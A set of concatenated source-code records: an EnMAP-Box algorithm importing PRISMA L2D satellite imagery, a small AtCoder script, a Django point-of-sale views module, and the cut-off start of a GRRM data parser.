self.addParameterVrtDestination(self.P_OUTPUT_PAN_CUBE, self._OUTPUT_PAN_CUBE, None, True, False)\r\n self.addParameterVrtDestination(\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION, self._OUTPUT_SPECTRAL_GEOLOCATION, None, True, False\r\n )\r\n self.addParameterVrtDestination(\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC, self._OUTPUT_SPECTRAL_GEOMETRIC, None, True, False\r\n )\r\n self.addParameterRasterDestination(self.P_OUTPUT_SPECTRAL_ERROR, self._OUTPUT_SPECTRAL_ERROR, None, True, False)\r\n self.addParameterVrtDestination(self.P_OUTPUT_PAN_GEOLOCATION, self._OUTPUT_PAN_GEOLOCATION, None, True, False)\r\n self.addParameterVrtDestination(self.P_OUTPUT_PAN_ERROR, self._OUTPUT_PAN_ERROR, None, True, False)\r\n\r\n def defaultParameters(self, file: str):\r\n return {\r\n self.P_FILE: file,\r\n self.P_OUTPUT_SPECTRAL_CUBE: file.replace('.he5', '_SPECTRAL.tif'),\r\n self.P_OUTPUT_PAN_CUBE: file.replace('.he5', '_PAN.vrt'),\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION: file.replace('.he5', '_SPECTRAL_GEOLOCATION.vrt'),\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC: file.replace('.he5', '_SPECTRAL_GEOMETRIC.vrt'),\r\n self.P_OUTPUT_SPECTRAL_ERROR: file.replace('.he5', '_SPECTRAL_ERROR.tif'),\r\n self.P_OUTPUT_PAN_GEOLOCATION: file.replace('.he5', '_PAN_GEOLOCATION.vrt'),\r\n self.P_OUTPUT_PAN_ERROR: file.replace('.he5', '_PAN_ERROR.vrt')\r\n }\r\n\r\n def isValidFile(self, file: str) -> bool:\r\n return basename(file).startswith('PRS_L2D') & \\\r\n basename(file).endswith('.he5')\r\n\r\n def openDataset(self, he5Filename: str, key: str) -> gdal.Dataset:\r\n key = key.replace(' ', '_')\r\n source = f'HDF5:\"\"\"{he5Filename}\"\"\"://{key}'\r\n ds: gdal.Dataset = gdal.Open(source)\r\n if ds is None:\r\n raise QgsProcessingException(f'unable to open PRISMA subdataset: {he5Filename}')\r\n return ds\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n he5Filename = self.parameterAsFile(parameters, self.P_FILE, context)\r\n\r\n spectralRegion = self.parameterAsEnum(parameters, self.P_SPECTRAL_REGION, context)\r\n badBandThreshold = self.parameterAsFloat(parameters, self.P_BAD_BAND_THRESHOLD, context)\r\n badPixelTypes = self.parameterAsEnums(parameters, self.P_BAD_PIXEL_TYPE, context)\r\n filenameSpectralCube = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_CUBE, context)\r\n filenameSpectralGeolocation = self.parameterAsOutputLayer(\r\n parameters, self.P_OUTPUT_SPECTRAL_GEOLOCATION, context\r\n )\r\n filenameSpectralGeometric = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_GEOMETRIC, context)\r\n filenameSpectralError = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_ERROR, context)\r\n\r\n filenamePanCube = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_CUBE, context)\r\n filenamePanGeolocation = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_GEOLOCATION, context)\r\n filenamePanError = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_ERROR, context)\r\n\r\n if badBandThreshold is not None:\r\n if filenameSpectralError is None:\r\n raise QgsProcessingException(f'Wrong or missing parameter value: {self._OUTPUT_SPECTRAL_ERROR}')\r\n\r\n with open(filenameSpectralCube + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n # check filename\r\n # e.g. 'PRS_L2D_STD_20201107101404_20201107101408_0001.he5'\r\n if not self.isValidFile(he5Filename):\r\n message = f'not a valid PRISMA L2D product: {he5Filename}'\r\n raise QgsProcessingException(message)\r\n\r\n badBandMultipliers = self.writeSpectralErrorMatrix(\r\n filenameSpectralError, he5Filename, spectralRegion, badBandThreshold, badPixelTypes, feedback\r\n )\r\n self.writeSpectralCube(filenameSpectralCube, he5Filename, spectralRegion, badBandMultipliers, feedback)\r\n self.writeSpectralGeolocationFields(filenameSpectralGeolocation, he5Filename)\r\n self.writeSpectralGeometricFields(filenameSpectralGeometric, he5Filename)\r\n\r\n self.writePanCube(filenamePanCube, he5Filename)\r\n self.writePanGeolocationFields(filenamePanGeolocation, he5Filename)\r\n self.writePanErrorMatrix(filenamePanError, he5Filename)\r\n\r\n utilsDeleteCopy(he5Filename)\r\n\r\n result = {\r\n self.P_OUTPUT_SPECTRAL_CUBE: filenameSpectralCube,\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION: filenameSpectralGeolocation,\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC: filenameSpectralGeometric,\r\n self.P_OUTPUT_SPECTRAL_ERROR: filenameSpectralError,\r\n self.P_OUTPUT_PAN_CUBE: filenamePanCube,\r\n self.P_OUTPUT_PAN_GEOLOCATION: filenamePanGeolocation,\r\n self.P_OUTPUT_PAN_ERROR: filenamePanError,\r\n }\r\n\r\n self.toc(feedback, result)\r\n\r\n return result\r\n\r\n def writeSpectralCube(\r\n self, filenameSpectralCube, he5Filename, spectralRegion, badBandMultipliers: Optional[List[int]],\r\n feedback\r\n ):\r\n parseFloatList = lambda text: [float(item) for item in text.split()]\r\n array = list()\r\n metadata = dict()\r\n wavelength = list()\r\n fwhm = list()\r\n # - VNIR\r\n if spectralRegion in [self.VnirSwirRegion, self.VnirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/VNIR_Cube'\r\n dsVnir = self.openDataset(he5Filename, key)\r\n arrayVnir = utilsReadAsArray(dsVnir, he5Filename, key, feedback)\r\n\r\n metadataVnir = dsVnir.GetMetadata('')\r\n selectedVnir = [v != 0 for v in parseFloatList(metadataVnir['List_Cw_Vnir'])]\r\n arrayVnir = np.transpose(arrayVnir, [1, 0, 2])[selectedVnir][::-1]\r\n wavelengthVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Cw_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n fwhmVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Fwhm_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n array.extend(arrayVnir)\r\n wavelength.extend(wavelengthVnir)\r\n fwhm.extend(fwhmVnir)\r\n metadata.update(metadataVnir)\r\n # - SWIR\r\n if spectralRegion in [self.VnirSwirRegion, self.SwirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/SWIR_Cube'\r\n dsSwir = self.openDataset(he5Filename, key)\r\n arraySwir = utilsReadAsArray(dsSwir, he5Filename, key, feedback)\r\n metadataSwir = dsSwir.GetMetadata('')\r\n selectedSwir = [v != 0 for v in parseFloatList(metadataSwir['List_Cw_Swir'])]\r\n arraySwir = np.transpose(arraySwir, [1, 0, 2])[selectedSwir][::-1]\r\n wavelengthSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Cw_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n fwhmSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Fwhm_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n array.extend(arraySwir)\r\n wavelength.extend(wavelengthSwir)\r\n fwhm.extend(fwhmSwir)\r\n metadata.update(metadataSwir)\r\n # - mask no data region\r\n mask = np.all(np.equal(array, 0), axis=0)\r\n array = np.clip(array, 1, None)\r\n array[:, mask] = 0\r\n assert len(wavelength) == len(array)\r\n assert len(fwhm) == len(array)\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n driver = Driver(filenameSpectralCube)\r\n writer = driver.createFromArray(array, extent, crs)\r\n writer.setNoDataValue(0)\r\n writer.setMetadataDomain(metadata)\r\n for bandNo in range(1, writer.bandCount() + 1):\r\n wl = wavelength[bandNo - 1]\r\n writer.setBandName(f'Band {bandNo} ({wl} Nanometers)', bandNo)\r\n writer.setWavelength(wl, bandNo)\r\n writer.setFwhm(fwhm[bandNo - 1], bandNo)\r\n writer.setScale(1. / 65535., bandNo)\r\n\r\n print(f'{round(wl, 1)},{round(fwhm[bandNo - 1], 1)}')\r\n\r\n if badBandMultipliers is not None:\r\n for bandNo, badBandMultiplier in enumerate(badBandMultipliers, 1):\r\n writer.setBadBandMultiplier(badBandMultiplier, bandNo)\r\n\r\n writer.close()\r\n del writer\r\n\r\n # setup default renderer\r\n layer = QgsRasterLayer(filenameSpectralCube)\r\n reader = RasterReader(layer)\r\n redBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['R'][0])\r\n greenBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['G'][0])\r\n blueBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['B'][0])\r\n redMin, redMax = reader.provider.cumulativeCut(redBandNo, 0.02, 0.98)\r\n greenMin, greenMax = reader.provider.cumulativeCut(greenBandNo, 0.02, 0.98)\r\n blueMin, blueMax = reader.provider.cumulativeCut(blueBandNo, 0.02, 0.98)\r\n renderer = Utils().multiBandColorRenderer(\r\n reader.provider, [redBandNo, greenBandNo, blueBandNo], [redMin, greenMin, blueMin],\r\n [redMax, greenMax, blueMax]\r\n )\r\n layer.setRenderer(renderer)\r\n layer.saveDefaultStyle(QgsMapLayer.StyleCategory.Rendering)\r\n\r\n def writeSpectralErrorMatrix(\r\n self, filenameSpectralError, he5Filename, spectralRegion, badPixelThreshold: Optional[float],\r\n badPixelTypes: List[int], feedback: QgsProcessingFeedback\r\n ) -> Optional[List[int]]:\r\n if filenameSpectralError is None:\r\n return None\r\n parseFloatList = lambda text: [float(item) for item in text.split()]\r\n array = list()\r\n metadata = dict()\r\n wavelength = list()\r\n # - VNIR\r\n if spectralRegion in [self.VnirSwirRegion, self.VnirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/VNIR_PIXEL_L2_ERR_MATRIX'\r\n dsVnir = self.openDataset(he5Filename, key)\r\n arrayVnir = utilsReadAsArray(dsVnir, he5Filename, key, feedback)\r\n metadataVnir = dsVnir.GetMetadata('')\r\n selectedVnir = [v != 0 for v in parseFloatList(metadataVnir['List_Cw_Vnir'])]\r\n arrayVnir = np.transpose(arrayVnir, [1, 0, 2])[selectedVnir][::-1]\r\n wavelengthVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Cw_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n array.extend(arrayVnir)\r\n wavelength.extend(wavelengthVnir)\r\n metadata.update(metadataVnir)\r\n # - SWIR\r\n if spectralRegion in [self.VnirSwirRegion, self.SwirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/SWIR_PIXEL_L2_ERR_MATRIX'\r\n dsSwir = self.openDataset(he5Filename, key)\r\n arraySwir = utilsReadAsArray(dsSwir, he5Filename, key, feedback)\r\n metadataSwir = dsSwir.GetMetadata('')\r\n selectedSwir = [v != 0 for v in parseFloatList(metadataSwir['List_Cw_Swir'])]\r\n arraySwir = np.transpose(arraySwir, [1, 0, 2])[selectedSwir][::-1]\r\n wavelengthSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Cw_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n array.extend(arraySwir)\r\n wavelength.extend(wavelengthSwir)\r\n metadata.update(metadataSwir)\r\n # - mask no data region\r\n assert len(wavelength) == len(array)\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n driver = Driver(filenameSpectralError, feedback=feedback)\r\n writer = driver.createFromArray(array, extent, crs)\r\n writer.setMetadataDomain(metadata)\r\n for bandNo in range(1, writer.bandCount() + 1):\r\n wl = wavelength[bandNo - 1]\r\n writer.setBandName(f'Pixel Error Band {bandNo} ({wl} Nanometers)', bandNo)\r\n writer.setWavelength(wl, bandNo)\r\n\r\n # bad pixel thresholding\r\n if badPixelThreshold is None:\r\n badBandMultipliers = None\r\n else:\r\n badBandMultipliers = list()\r\n for bandNo, a in enumerate(array, 1):\r\n badPixelMask = np.full_like(a, False, bool)\r\n # Note that we just compare against individual bit flags.\r\n # That should be fine, because all flags are mutually exclusive.\r\n # We wouldn't expect values other than 0, 1, 2 and 4.'\r\n if self.InvalidL1Pixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 1, out=badPixelMask)\r\n if self.NegativeAtmosphericCorrectionPixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 2, out=badPixelMask)\r\n if self.SaturatedAtmosphericCorrectionPixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 4, out=badPixelMask)\r\n badPixelProportion = np.mean(badPixelMask)\r\n message = f'Band {bandNo} bad pixel proportion: {round(badPixelProportion, 4)}'\r\n if badPixelProportion < badPixelThreshold:\r\n badBandMultiplier = 1\r\n else:\r\n badBandMultiplier = 0\r\n message += ' (marked as bad band)'\r\n badBandMultipliers.append(badBandMultiplier)\r\n feedback.pushInfo(message)\r\n\r\n return badBandMultipliers\r\n\r\n def writeSpectralGeolocationFields(self, filenameSpectralGeolocation, he5Filename):\r\n if filenameSpectralGeolocation is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geolocation_Fields/Longitude')\r\n ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geolocation_Fields/Latitude')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenameSpectralGeolocation, [ds1, ds2], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setBandName('Longitude', 1)\r\n writer.setBandName('Latitude', 2)\r\n\r\n def writeSpectralGeometricFields(self, filenameSpectralGeometric, he5Filename):\r\n if filenameSpectralGeometric is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Observing_Angle')\r\n ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Rel_Azimuth_Angle')\r\n ds3 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Solar_Zenith_Angle')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenameSpectralGeometric, [ds1, ds2, ds3], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setNoDataValue(0)\r\n writer.setBandName('Observing Angle', 1)\r\n writer.setBandName('Relative Azimuth Angle', 2)\r\n writer.setBandName('Solar Zinith Angle', 3)\r\n\r\n def writePanCube(self, filenamePanCube, he5Filename):\r\n if filenamePanCube is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Data_Fields/Cube')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenamePanCube, [ds1], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setNoDataValue(0)\r\n writer.setScale(1. / 65535., 1)\r\n writer.setBandName('Panchromatic', 1)\r\n\r\n def writePanGeolocationFields(self, filenamePanGeolocation, he5Filename):\r\n if filenamePanGeolocation is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Geolocation_Fields/Longitude')\r\n ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Geolocation_Fields/Latitude')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenamePanGeolocation, [ds1, ds2], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setBandName('Longitude', 1)\r\n writer.setBandName('Latitude', 2)\r\n\r\n def writePanErrorMatrix(self, filenamePanError, he5Filename):\r\n if filenamePanError is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Data_Fields/PIXEL_L2_ERR_MATRIX')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenamePanError, [ds1], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setBandName('PAN Band Pixel Error', 1)\r\n\r\n def spatialInfo(self, metadata, res):\r\n extent = QgsRectangle(\r\n float(metadata['Product_ULcorner_easting']) - res / 2,\r\n float(metadata['Product_LRcorner_northing']) - res / 2,\r\n float(metadata['Product_LRcorner_easting']) + res / 2,\r\n float(metadata['Product_ULcorner_northing']) + res / 2\r\n )\r\n crs = QgsCoordinateReferenceSystem.fromEpsgId(int(metadata['Epsg_Code']))\r\n geoTransform = (extent.xMinimum(), res, -0., extent.yMaximum(), -0., -res)\r\n return crs, extent, geoTransform\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/importprismal2dalgorithm.py","file_name":"importprismal2dalgorithm.py","file_ext":"py","file_size_in_byte":25699,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"26529214291","text":"def gen(start):\n if start == 10:\n return [[]]\n ans = []\n for i in range(start, 10):\n for opt in gen(i+1):\n ans.append([[start, i]] + opt)\n return ans\n\nprint(str(gen(0)).replace(\"[\", \"{\").replace(\"]\", \"}\"))","repo_name":"cormackikkert/competitive-programming","sub_path":"AtCoder/Beginner 159/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72742395045","text":"import json\nimport pandas as pd\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom pointofsale.forms import AddCategoryForm, AddProductForm, UpdateProductForm\nfrom django.contrib.auth.models import User\nfrom django.views.generic import CreateView, ListView, DetailView, View\nfrom pointofsale.models import Product, Purchase, PurchaseItem, Accounting\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom django.http import FileResponse\nfrom django.db.models import Sum\nimport datetime\n\n# Create your views here.\ndef home(request):\n return render(request, 'pointofsale/home.html')\n\ndef dashboard(request):\n products = Product.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n total_expenses = Product.objects.aggregate(Sum('total_cost_price'))['total_cost_price__sum']\n purchase_number = Purchase.objects.filter(purchased=True).count()\n category_form = AddCategoryForm()\n product_form = AddProductForm()\n update_form = UpdateProductForm()\n context = {\n 'category_form': category_form, \n 'product_form': product_form,\n 'update_form': update_form,\n 'products': products,\n 'purchase_number': purchase_number,\n 'total_sales': total_sales,\n 'total_expenses': total_expenses,\n }\n return render(request, 'pointofsale/dashboard.html', context)\n\n\n\ndef inventory(request):\n products = Product.objects.all()\n category_form = AddCategoryForm()\n product_form = AddProductForm()\n update_form = UpdateProductForm()\n context = {\n 'category_form': category_form, \n 'product_form': product_form,\n 'update_form': update_form,\n 'products': products,\n }\n return render(request, 'pointofsale/inventory.html', context)\n\ndef accounting(request):\n products = Product.objects.all()\n accounting = Accounting.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n total_expenses = Product.objects.aggregate(Sum('total_cost_price'))['total_cost_price__sum']\n purchase_number = Purchase.objects.filter(purchased=True).count()\n if total_expenses == None and total_sales == None:\n profit_loss = None\n else:\n profit_loss = total_sales - total_expenses\n context = {\n 'products': products, \n 'purchase_number': purchase_number,\n 'total_sales': total_sales,\n 'total_expenses': total_expenses,\n 'profit_loss': profit_loss,\n }\n return render(request, 'pointofsale/accounting.html', context)\n\n\ndef filter_date(request):\n selected_month = request.GET['month']\n if selected_month == 'January':\n selected_month_int = 1\n elif selected_month == 'February':\n selected_month_int = 2\n elif selected_month == 'March':\n selected_month_int = 3\n elif selected_month == 'April':\n selected_month_int = 4\n elif selected_month == 'May':\n selected_month_int = 5\n elif selected_month == 'June':\n selected_month_int = 6\n elif selected_month == 'July':\n selected_month_int = 7\n elif selected_month == 'August':\n selected_month_int = 8\n elif selected_month == 'September':\n selected_month_int = 9\n elif selected_month == 'October':\n selected_month_int = 10\n elif selected_month == 'November':\n selected_month_int = 11\n elif selected_month == 'December':\n selected_month_int = 12\n purchase_item_qs = PurchaseItem.objects.filter(month=selected_month_int)\n if purchase_item_qs.exists():\n purchase_item = purchase_item_qs[0]\n total_sales_by_month = Purchase.objects.filter(month=selected_month_int).aggregate(Sum('total_amount'))['total_amount__sum']\n context = {'purchases': purchase_item_qs, 'selected_month': selected_month, 'total_sales_by_month':total_sales_by_month}\n return render(request, 'pointofsale/report.html', context)\n\n else:\n purchases = PurchaseItem.objects.all()\n context = {'purchases': purchases}\n return render(request, 'pointofsale/report.html')\n\ndef report(request):\n purchases = PurchaseItem.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n context = {\n 'purchases': purchases,\n 'total_sales': total_sales,\n }\n return render(request, 'pointofsale/report.html', context)\n\ndef add_category(request):\n if request.method == 'POST':\n category_form = AddCategoryForm(request.POST)\n if category_form.is_valid():\n category_form.save()\n name = category_form.cleaned_data.get('name')\n messages.success(request, f'{name} Category Added Successfully')\n return redirect('pointofsale-inventory')\n else:\n category_form = AddCategoryForm()\n return render(request, 'pointofsale/inventory.html', {'category_form': category_form})\n\ndef add_product(request):\n try:\n if request.method == 'POST':\n product_form = AddProductForm(request.POST)\n if product_form.is_valid():\n Product = product_form.save(commit=False)\n Product.staff = request.user\n image = request.FILES['image_field']\n file_save = FileSystemStorage()\n file_save.save(image.name, image)\n Product.image_field = image\n Product = Product.save()\n name = product_form.cleaned_data.get('name')\n messages.success(request, f'{name} Product Added Successfully')\n return redirect('pointofsale-inventory')\n else:\n product_form = AddProductForm()\n return render(request, 'pointofsale/inventory.html', {'product_form': product_form})\n except:\n messages.warning(request, f'Add image before upload')\n return render(request, 'pointofsale/inventory.html')\n\ndef update_product(request):\n update_form = UpdateProductForm(request.POST)\n if request.method =='POST':\n product_id = request.POST['product_id']\n name = request.POST['name']\n desc = request.POST['desc']\n cost_price = request.POST['cost_price']\n selling_price = request.POST['selling_price']\n discount_price = request.POST['discount_price']\n category = update_form.data['category']\n Product.objects.filter(pk=int(product_id)).update(id=int(product_id), name=name, description=desc, cost_price=cost_price,\n selling_price=selling_price,discount_price=discount_price, category_id=int(category))\n \n messages.success(request, f'Product Updated Successfully')\n return redirect('pointofsale-inventory')\n \ndef stock_product(request):\n if request.method =='POST':\n product_id = request.POST['product_id']\n quantity = request.POST['quantity']\n cost_price = request.POST['cost_price']\n total_cost_price = int(cost_price) * int(quantity)\n Product.objects.filter(pk=int(product_id)).update(quantity=quantity, total_cost_price=total_cost_price)\n \n messages.success(request, f'Product Stocked Successfully')\n return redirect('pointofsale-inventory')\n\ndef delete_product(request):\n if request.method =='POST':\n product_id = request.POST['product_id']\n Product.objects.filter(pk=int(product_id)).delete()\n \n messages.success(request, f'Product Deleted Successfully')\n return redirect('pointofsale-inventory')\n\n\nclass SalesView(ListView):\n model = Product\n template_name = \"pointofsale/sales.html\"\n context_object_name = \"products\"\n paginate_by = 8\n ordering = ['name']\n\ndef search(request):\n if request.method == 'POST':\n search = request.POST['search']\n search = search.lower()\n if search:\n match = Product.objects.filter(name__icontains=search)\n\n if match:\n return render(request, 'pointofsale/sales.html', {'products': match})\n else:\n messages.error(request, \"No Product Found\")\n return render(request, 'pointofsale/sales.html')\n \n \nclass ProductDetailView(DetailView):\n model = Product\n template_name = \"pointofsale/product-page.html\"\n\n@login_required\ndef add_to_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_item, created = PurchaseItem.objects.get_or_create(product=product, user=request.user, purchased=False)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item.quantity +=1\n purchase_item.save()\n messages.info(request, \"This product quantity has been updated in the receipt\")\n else:\n purchase.product.add(purchase_item)\n messages.info(request, \"This product has been added to the receipt\")\n\n else:\n ordered_date = timezone.now()\n purchase = Purchase.objects.create(user=request.user, ordered_date=ordered_date)\n purchase.product.add(purchase_item)\n return redirect(\"pointofsale-sales\")\n\n@login_required\ndef add_to_cart_quantity(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_item, created = PurchaseItem.objects.get_or_create(product=product, user=request.user, purchased=False)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item.quantity +=1\n purchase_item.save()\n messages.info(request, \"This product quantity has been updated in the receipt\")\n else:\n purchase.product.add(purchase_item)\n messages.info(request, \"This product has been added to the receipt\")\n\n else:\n ordered_date = timezone.now()\n purchase = Purchase.objects.create(user=request.user, ordered_date=ordered_date)\n purchase.product.add(purchase_item)\n return redirect(\"order-summary\")\n\ndef remove_from_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n # check if the order item is in the order\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item = PurchaseItem.objects.filter(product=product, user=request.user, purchased=False)[0]\n purchase.product.remove(purchase_item)\n purchase_item.delete()\n messages.info(request, \"This item was removed from your cart.\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"You do not have an active order\")\n return redirect(\"order-summary\")\n\n\ndef remove_single_item_from_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n # check if the order item is in the order\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item = PurchaseItem.objects.filter(product=product, user=request.user, purchased=False)[0]\n if purchase_item.quantity > 1:\n purchase_item.quantity -= 1\n purchase_item.save()\n else:\n purchase.product.remove(purchase_item)\n messages.info(request, \"This item quantity was updated.\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"You do not have an active order\")\n return redirect(\"order-summary\")\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self, *args, **kwargs):\n try:\n purchase = Purchase.objects.get(user=self.request.user, purchased=False)\n context = {\n 'object': purchase\n }\n return render(self.request, 'pointofsale/receipt.html', context)\n except ObjectDoesNotExist:\n messages.error(self.request, \"You do not have any order\")\n return redirect('pointofsale-sales')\n \n\n\ndef receive_payment(request):\n if request.method == 'POST':\n purchase = Purchase.objects.get(user=request.user, purchased=False)\n purchase_item = purchase.product.all()\n purchase_item.update(purchased=True)\n for item in purchase_item:\n Product.objects.filter(pk=int(item.product.id)).update(quantity=(item.product.quantity - item.quantity))\n item.save()\n purchase.total_amount = purchase.get_total() \n purchase.purchased = True\n purchase.save()\n messages.success(request, \"Payment received successfully\")\n return redirect('pointofsale-sales')\n\n\n","repo_name":"chidibede/django_pos_app","sub_path":"pointofsale_project/pointofsale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19361588236","text":"import os\nimport copy\nimport glob\nfrom .tools_unit_constant import unit_ang2au, unit_au2ang\nfrom .parser_grrm_param import parser_grrm_param\n\ndef parser_grrm_dat(fname):\n\n tmp_fn_list=glob.glob(\"%s_P*.dat\" % (fname))\n tmp_fn_list.sort()\n\n ## ---------------\n ## get list dat\n ## ---------------\n out_list=[]\n count_id=0\n for ifn in range(0, len(tmp_fn_list)):\n t_num=tmp_fn_list[ifn][len(fname)+2:-4]\n if t_num.isnumeric():\n tmp_dat,count_id\\\n =_load_dat_file(tmp_fn_list[ifn], count_id)\n\n for idat in range(0,len(tmp_dat)):\n out_list.append(copy.deepcopy(tmp_dat[idat]))\n \n del tmp_dat\n\n if len(out_list) > 0:\n return out_list\n\n \n ## -------------------------\n ## Find infile jobs\n ## -------------------------\n fn_param_rrm=\"%s_PARAM.rrm\" % (fname)\n param_infile=\"none\"\n param_jobtype=\"none\"\n if 